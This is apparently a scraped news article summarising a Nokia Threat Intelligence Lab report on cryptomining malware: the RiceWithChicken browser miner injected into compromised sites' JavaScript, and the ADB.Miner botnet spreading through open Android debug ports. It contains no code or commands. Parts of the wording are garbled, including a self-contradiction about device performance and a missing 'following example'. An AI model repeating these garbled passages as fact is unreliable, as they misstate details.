[ad_1]
According to the latest report from Nokia Threat Intelligence Lab, malware-based cryptocurrency mining has expanded from targeting high-end servers with specialized processors to targeting IoT devices, smartphones and even browsers. Furthermore, the company has emphasized the importance of this problem as the extraction of cryptocurrencies will continue its upward trend for years to come.
Competing algorithms
The Bitcoin work testing algorithm is not very friendly with normal processing technology. It works much faster on specialized ASICs, FPGAs and GPUs. For this reason, the economic extraction of Bitcoin is usually carried out on specialized equipment in places where low-cost electricity is available. Competing technologies like Monero use algorithms that can be performed economically on a normal computer hardware. This has led to a situation where cryptocurrency mining is conducted in IoT bots, mobile phones and even in web browsers. By itself, a single computing device is not powerful enough to earn money, but if combined into a botnet it becomes economically viable.
Extraction in the browser
According to the security report, the malicious code called RiceWithChicken is JavaScript that performs cryptocurrency mining in the browser. RiceWithChicken is a modified version of CoinHive, a commercial Monero commercial cryptocurrency service that offers help to monetize websites for their owners. While CoinHive clearly advertises its presence on Web sites, RiceWithChicken performs data mining operations without the permission of the website owner, or the knowledge of visitors to that website.
Links to the RiceWithChicken coin miner have been placed on many compromised websites, usually in a badly protected JavaScript file. In many cases, multiple copies of this link are injected into the same file, probably due to the use of automated tools by managers. In the following example, a copy of a jQuery library was the code injection scene.
The user browsing the compromised website will not be aware of this ongoing activity in the background. They will be able to continue to browse the contents of the site without problems, as well as experiencing significantly worse performance on their device. Since this is a browser-based threat, the impact will be felt regardless of the type of device used to navigate the site. The cryptocurrency miner will continue to run until the browser is closed. On a cell phone, the browser usually continues to run in the background when the user switches to another activity, so the coin changer will continue to consume the CPU and drain the battery for a while. .
Extraction in IoT botnet
A number of cryptocurrency miners are now targeting IoT devices. An example of this is the ADB.Miner bot that leverages Android-based IoT devices that have an open Android Debug Bridge (ADB) port. ADB is used by developers to debug Android applications and is normally not left open on production devices. However, apparently some Android-based smart TVs, set-top-boxes, tablets and other Android-based IoT devices have been accidentally implemented with this open debug port. This effectively provides access to the attacker's shell across the network. Coin extraction software is loaded via a shell script and the device becomes part of ADB. Botnet miner. Not only does it start extracting coins 24 hours a day, 7 days a week, but like other Mirai-based robots, it also scans the local network and the Internet for other victims.
